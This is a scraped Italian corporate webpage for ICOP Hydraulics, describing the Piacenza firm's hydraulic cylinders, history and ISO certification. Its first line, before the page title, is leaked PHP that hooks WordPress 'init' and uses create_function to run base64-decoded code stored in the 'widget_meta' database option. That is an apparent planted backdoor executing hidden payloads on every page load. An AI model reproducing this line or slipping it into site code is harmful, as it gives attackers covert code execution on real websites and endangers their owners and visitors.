add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); Icop Hydraulics | ICOP HYDRAULICS
ICOP HYDRAULICS “Per raggiungere la perfezione nella progettazione e costruzione di impianti e cilindri oleodinamici è fondamentale concentrarsi su ogni dettaglio del prodotto”

Azienda

ICOP HYDRAULICS è una società di produzione a proprietà privata, situata a nord Italia, nella città di Piacenza (PC). L’azienda nasce nel 1978 con lo scopo di integrare, migliorare e innovare le competenze tecniche del suo fondatore e attuale presidente Sig. Giovanni Leccacorvi.

Oltre 30 anni di attività e di impegno costante nel fornire al cliente un prodotto efficiente hanno contribuito a imprimere il carattere e la personalità dell’Azienda, riconosciuta per la professionalità e la serietà del personale all’interno.

La conoscenza approfondita del funzionamento delle presse oleodinamiche ha permesso alla società di concentrarsi nella progettazione e costruzione di una delle parti più importanti di queste macchine: i cilindri oleodinamici.
Nel corso degli anni ICOP HYDRAULICS ha affiancato una nuova linea produttiva di macchine automatiche per la diamantatura e la lavorazione di utensili industriali.
La società opera all’interno di stabilimenti altamente innovativi con superficie coperta di 3000 mq secondo i requisiti di qualità richiesti dalla certificazione ISO 9001:2000 rilasciata dal RINA .

ICOP HYDRAULICS è situata in una regione con alta densità di università in grado di preparare addetti altamente qualificati.
L’azienda svolge un ruolo di fondamentale importanza per numerose aziende del settore navale, militare, perforazione, miniere, sollevamento, edile, movimento terra, recupero materiali ferrosi, settore siderurgico, industria e automazioni che cercano componenti e sistemi oleodinamici che rispondano perfettamente alle proprie aspettative.

La propria rete di fornitori è integrata nel distretto industriale italiano più importante di produttori macchine utensili.
L’ obiettivo di ICOP HYDRAULICS è differenziarsi rispetto alla media dei produttori: per questo motivo affida la propria crescita a cilindri oleodinamici in grado di sviluppare prestazioni superiori rispetto alla concorrenza.

Grazie all’abbinamento con intensificatori di pressione a doppio effetto automatici, i propri clienti possono creare macchine più performanti, a minore impatto ambientale con costi di esercizio ridotti.
© 2014 Powered by: Softwise srl | Cookie